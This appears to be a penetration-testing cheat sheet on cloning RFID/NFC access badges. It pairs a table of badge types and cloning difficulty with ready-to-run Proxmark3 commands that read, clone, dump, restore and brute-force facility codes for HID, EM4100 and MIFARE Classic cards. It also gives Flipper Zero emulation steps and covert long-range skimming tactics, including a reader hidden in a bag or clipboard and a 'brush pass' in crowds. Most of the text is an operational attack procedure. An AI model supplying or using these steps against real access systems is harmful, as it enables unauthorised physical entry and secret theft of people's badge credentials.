Badge Cloning & RFID Attacks
Exploitation
Electronic access control systems rely on RFID/NFC badges. Many legacy systems are vulnerable to cloning or replay attacks.
RFID/NFC Badge Types
| Frequency | Type | Common Use | Clone Difficulty |
|---|---|---|---|
| 125 kHz | HID ProxCard | Legacy access | Easy |
| 125 kHz | EM4100 | Basic access | Easy |
| 13.56 MHz | MIFARE Classic | Access/transit | Medium |
| 13.56 MHz | MIFARE DESFire | Secure access | Hard |
| 13.56 MHz | iCLASS | HID high security | Medium-Hard |
Proxmark3 Commands
Reading Badges
bash
proxmark3> lf search # Detect low frequency card
proxmark3> hf search # Detect high frequency cardClone HID ProxCard (125 kHz)
bash
proxmark3> lf hid read # Read card
proxmark3> lf hid clone [ID] # Write to T5577 blankClone EM4100 (125 kHz)
bash
proxmark3> lf em 410x read # Read card
proxmark3> lf em 410x clone [ID]MIFARE Classic Attack
bash
proxmark3> hf mf autopwn # Attempts various attacks
proxmark3> hf mf dump # Dump all sectors
proxmark3> hf mf restore # Write to blank cardBrute Force Facility Codes
bash
proxmark3> lf hid brute [CN] # Try all FCs for card numberFlipper Zero (Portable Alternative)
- 125kHz → Read → Save
- 125kHz → Saved → Emulate
- NFC → Read → Save & Emulate
Long-Range Reading Techniques
- Use directional antenna with Proxmark3 (25+ cm range)
- Concealed reader in bag/clipboard
- "Brush pass" technique in crowds
Badge Format (HID Example)
HID badges use: FC (Facility Code) + CN (Card Number)
Example: FC:100 CN:12345